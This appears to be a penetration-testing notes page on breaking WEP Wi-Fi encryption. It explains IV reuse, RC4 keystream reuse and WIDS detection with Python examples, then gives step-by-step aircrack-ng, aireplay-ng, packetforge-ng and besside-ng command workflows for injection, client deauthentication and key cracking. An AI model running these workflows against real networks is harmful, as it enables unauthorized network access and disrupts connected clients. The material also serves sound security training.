# WEP Attacks
## Overview
Wired Equivalent Privacy (WEP) is the original 802.11 encryption protocol, standardized in 1997 and comprehensively broken since 2004. It uses RC4 with a 24-bit Initialization Vector (IV) that repeats on busy networks, making it trivially exploitable. WEP was officially deprecated by the Wi-Fi Alliance in 2004, but it still appears on:
- Legacy embedded devices (industrial controllers, medical equipment)
- Old consumer routers with default configurations
- IoT devices with constrained firmware
- CTF challenges and training environments
Time to crack: Typically 3–10 minutes with active injection, under 5 minutes on busy networks.
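Why "~5,000 packets" is the right order of magnitude: an added worked example, not part of the original page, that applies the birthday bound to WEP's 24-bit IV space. It also shows how quickly a sequential IV counter wraps at a given frame rate.

```python
import math

IV_BITS = 24                 # WEP's IV is 24 bits, so only 2**24 distinct values exist
IV_SPACE = 1 << IV_BITS


def iv_collision_probability(packets: int, iv_space: int = IV_SPACE) -> float:
    """Probability that at least two of `packets` randomly chosen IVs are
    identical (birthday bound), using the exact product rather than an
    approximation so small packet counts are handled correctly."""
    if packets > iv_space:
        return 1.0
    no_collision = 1.0
    for i in range(packets):
        no_collision *= 1.0 - i / iv_space
    return 1.0 - no_collision


def packets_for_probability(p: float, iv_space: int = IV_SPACE) -> int:
    """Smallest packet count at which a collision is at least `p` likely,
    via the standard approximation n ~ sqrt(2 * N * ln(1 / (1 - p)))."""
    return math.ceil(math.sqrt(2 * iv_space * math.log(1.0 / (1.0 - p))))


def seconds_to_exhaust_iv_space(frames_per_second: float, iv_space: int = IV_SPACE) -> float:
    """Time until a card that increments the IV sequentially wraps around,
    after which every IV is guaranteed to be reused."""
    return iv_space / frames_per_second
```

At 500 frames per second the whole IV space is exhausted in about 9.3 hours, and the 50% collision point is reached after roughly 4,800 frames.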
## WEP Vulnerability Summary
| Vulnerability | Impact | Exploitation |
|---|---|---|
| 24-bit IV space | IVs repeat every ~5,000 packets on busy networks | Collect IVs → statistical key recovery |
| Key reuse | Same IV + key stream reveals plaintext XOR | XOR captured packets to recover key stream |
| RC4 key scheduling | Weak FMS keys reveal key bytes statistically | FMS/KoreK statistical attack |
| Authentication spoofing | Shared Key Authentication leaks key stream | Chopchop/fragmentation recover key stream |
| No integrity protection | ICV is CRC-32, modifiable by attacker | Packet injection, bit-flipping |
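Why the "key reuse" row is fatal for a stream cipher: an added simulation, not from the original page, of WEP's per-packet key construction (IV || root key) with a textbook RC4 and constructed plaintexts. The root key is random and is never consulted by the recovery function; a predictable LLC/SNAP header plays the role of the known plaintext.

```python
import os


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key-scheduling (KSA) followed by the PRGA."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP per-packet key is IV || root key, and the 3-byte IV is sent in the
    clear in front of the ciphertext. The CRC-32 ICV is omitted; this models
    confidentiality only."""
    return iv + xor_bytes(rc4_keystream(iv + root_key, len(plaintext)), plaintext)


def recover_other_plaintext(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Two frames under the same IV share a key stream, so c1 ^ c2 == p1 ^ p2.
    Knowing p1 (here a fixed LLC/SNAP header) yields p2 without the key."""
    assert c1[:3] == c2[:3], "demonstration requires an IV collision"
    n = min(len(known_p1), len(c1) - 3, len(c2) - 3)
    return xor_bytes(xor_bytes(c1[3:3 + n], c2[3:3 + n]), known_p1[:n])


def demo() -> bytes:
    key = os.urandom(5)                            # constructed 40-bit root key
    iv = b"\x01\x02\x03"                           # constructed colliding IV
    p1 = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"       # LLC/SNAP + ARP ethertype
    p2 = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"       # LLC/SNAP + IPv4 ethertype
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    return recover_other_plaintext(c1, c2, p1)     # equals p2, key never used
```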
## Attack Workflows
### Method 1: Aircrack-ng Standard (FMS/KoreK)
The most common approach — collect IVs, then crack statistically.
```bash
# Step 1: Start monitor mode
sudo airmon-ng start wlan0
# Step 2: Identify WEP target
sudo airodump-ng wlan0mon --encrypt WEP
# Step 3: Targeted capture (lock to channel and BSSID)
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write wep-target
# Step 4: Accelerate IV collection with aireplay-ng (ARP replay)
# This injects ARP requests to force the AP to generate new IVs
sudo aireplay-ng -3 -b <AP_MAC> -h <CLIENT_MAC> wlan0mon
# Step 5: Deauth a client to force reconnection (generates IVs)
sudo aireplay-ng -0 5 -a <AP_MAC> wlan0mon
# Step 6: Crack when 10,000+ IVs collected (5,000 may suffice on busy networks)
aircrack-ng wep-target-01.cap
```
### Method 2: Chopchop Attack (No Client Needed)
When no connected clients are available for ARP replay, use the chopchop attack to decrypt packets one byte at a time.
```bash
# Step 1: Capture some traffic
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write wep-chopchop
# Step 2: Run chopchop attack
sudo aireplay-ng -4 -b <AP_MAC> -h <YOUR_MAC> wlan0mon
# This writes replay_dec-<date>-<time>.cap (the decrypted packet)
# and replay_dec-<date>-<time>.xor (the recovered key stream)
# Step 3: Forge an ARP packet using the recovered key stream
packetforge-ng -0 -a <AP_MAC> -h <YOUR_MAC> \
-l 192.168.1.100 -k 192.168.1.255 \
-y replay_dec-*.xor -w forged-arp.cap
# Step 4: Inject the forged ARP to generate IVs
sudo aireplay-ng -2 -r forged-arp.cap wlan0mon
# Step 5: Crack with collected IVs
aircrack-ng wep-chopchop-01.cap
```
### Method 3: Fragmentation Attack
Similar to chopchop but recovers the full key stream faster. Requires at least one packet from the AP.
```bash
# Step 1: Start capture
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write wep-frag
# Step 2: Run fragmentation attack
sudo aireplay-ng -5 -b <AP_MAC> -h <YOUR_MAC> wlan0mon
# This writes a fragment-<date>-<time>.xor key stream file
# Step 3: Forge ARP packet
packetforge-ng -0 -a <AP_MAC> -h <YOUR_MAC> \
-l 192.168.1.100 -k 192.168.1.255 \
-y fragment-*.xor -w forged-frag.cap
# Step 4: Inject forged packet
sudo aireplay-ng -2 -r forged-frag.cap wlan0mon
# Step 5: Crack
aircrack-ng wep-frag-01.cap
```
### Method 4: Besside-ng (Automated)
Automated WEP cracking tool that handles the entire process.
```bash
# Automatic WEP cracking (one command; -W restricts it to WEP networks)
sudo besside-ng wlan0mon -W
# Against a specific target
sudo besside-ng wlan0mon -b <AP_MAC> -W
# Results saved to /tmp/besside/ with cracked key
```
### Method 5: Wesside-ng (Fully Automated)
The most automated option — discovers WEP networks and cracks them automatically.
```bash
# Fully automated WEP attack (the interface must be given with -i)
sudo wesside-ng -i wlan0mon
# Against a specific target (-v selects the victim AP; -a would set your own source MAC)
sudo wesside-ng -i wlan0mon -v <AP_MAC>
```
## Practical Considerations
### When WEP Still Matters
- Industrial control systems — SCADA devices, PLCs, and HMI panels often run WEP
- Medical devices — Older patient monitors and imaging equipment
- IoT sensors — Low-power devices that can't support WPA2's computational requirements
- Hotel/conference rooms — Old APs still configured for WEP compatibility
- CTF challenges — WEP cracking is a common CTF skill
### IV Collection Speed
| Method | IVs/minute | Time to 10,000 IVs |
|---|---|---|
| Passive (no injection) | 50–200 | 50–200 min |
| ARP replay (with client) | 500–2,000 | 5–20 min |
| Chopchop (no client) | 100–500 | 20–100 min |
| Fragmentation (no client) | 200–1,000 | 10–50 min |
### Minimum IVs Required
| Key Size | Minimum IVs | Recommended |
|---|---|---|
| 64-bit (40-bit key + 24-bit IV) | 4,000 | 10,000 |
| 128-bit (104-bit key + 24-bit IV) | 10,000 | 40,000 |
| 256-bit (uncommon) | 20,000 | 100,000 |
### Common Pitfalls
- "No data captured" — IV collection requires active traffic. Use aireplay-ng to inject ARP requests.
- "No key found" — Collect more IVs. Try again at 20,000, 40,000, 80,000.
- Channel hopping — Lock your adapter to the target channel with `--channel <CH>`.
- Adapter doesn't inject — Not all adapters support packet injection. Use an Alfa AWUS036ACH or similar chipset known for injection.
- Shared Key Authentication (SKA) — If the AP uses SKA instead of Open System, you must capture a SKA handshake before ARP replay works. Use `airodump-ng` with `--encrypt WEP` and check the AUTH column to identify the auth type.
### OPSEC Considerations
- ARP replay injection generates abnormal traffic patterns that WIDS/WIPS detect
- Deauthentication frames are logged by enterprise APs
- WEP cracking tools create monitor-mode interfaces visible to network scanning
- Always verify scope authorization — WEP cracking on production networks can cause instability
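The WIDS signatures behind the first two bullets, as an added detection sketch that is not from the original page and not any real WIDS product: it scans constructed frame summaries for deauthentication bursts and for data frames re-injected verbatim, which share one IV because the injector replays a captured frame unchanged while legitimate traffic carries a fresh IV per frame. Thresholds and window are assumed values.

```python
from collections import defaultdict, deque

DEAUTH_THRESHOLD = 5      # deauth frames from one source address within WINDOW_S
REPLAY_THRESHOLD = 20     # identical (src, dst, iv, len) data frames within WINDOW_S
WINDOW_S = 2.0            # sliding window in seconds (assumed tuning values)


def detect(frames):
    """frames: iterable of (time_s, kind, src, dst, iv_hex, length) in time order.
    Returns [(time_s, alert_type, offender)], one alert per offender, emitted the
    first time its count inside the sliding window reaches the threshold."""
    recent = defaultdict(deque)          # key -> timestamps still inside the window
    alerts, reported = [], set()
    for t, kind, src, dst, iv, length in frames:
        if kind == "deauth":
            key = ("deauth_burst", src)
        elif kind == "data":
            key = ("iv_replay", (src, dst, iv, length))
        else:
            continue                     # other management/control frames ignored here
        window = recent[key]
        window.append(t)
        while window and t - window[0] > WINDOW_S:
            window.popleft()
        limit = DEAUTH_THRESHOLD if key[0] == "deauth_burst" else REPLAY_THRESHOLD
        if len(window) >= limit and key not in reported:
            reported.add(key)
            alerts.append((t, key[0], key[1]))
    return alerts


def constructed_sample():
    """Synthetic frame list (not a real capture): normal client traffic with a
    fresh IV per frame, six deauths from a spoofed AP address, then one
    68-byte ARP frame replayed 40 times with the same IV."""
    ap, client, rogue = "02:aa:bb:cc:dd:ee", "00:11:22:33:44:55", "00:de:ad:be:ef:01"
    frames = [(0.05 * i, "data", client, ap, f"{i:06x}", 110) for i in range(30)]
    frames += [(1.5 + 0.02 * i, "deauth", ap, client, "-", 26) for i in range(6)]
    frames += [(2.0 + 0.01 * i, "data", rogue, ap, "0a1b2c", 68) for i in range(40)]
    return frames
```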
## Cross-References
- WPA/WPA2 Cracking — For modern WiFi networks
- PMKID Attack — Stealthier alternative to handshake capture
- 01 - Pre-Foothold — Passive wireless survey before active attack
## Tool References
| Tool | Purpose | Link |
|---|---|---|
| aircrack-ng | WEP/WPA capture and cracking suite | https://www.aircrack-ng.org/ |
| besside-ng | Automated WEP/WPA cracking | https://www.aircrack-ng.org/ |
| wesside-ng | Fully automated WEP attack | https://www.aircrack-ng.org/ |
| packetforge-ng | Forge encrypted packets for injection | https://www.aircrack-ng.org/ |
## Source Machines
- No specific HTB machines; WEP networks appear in CTF challenges and legacy environments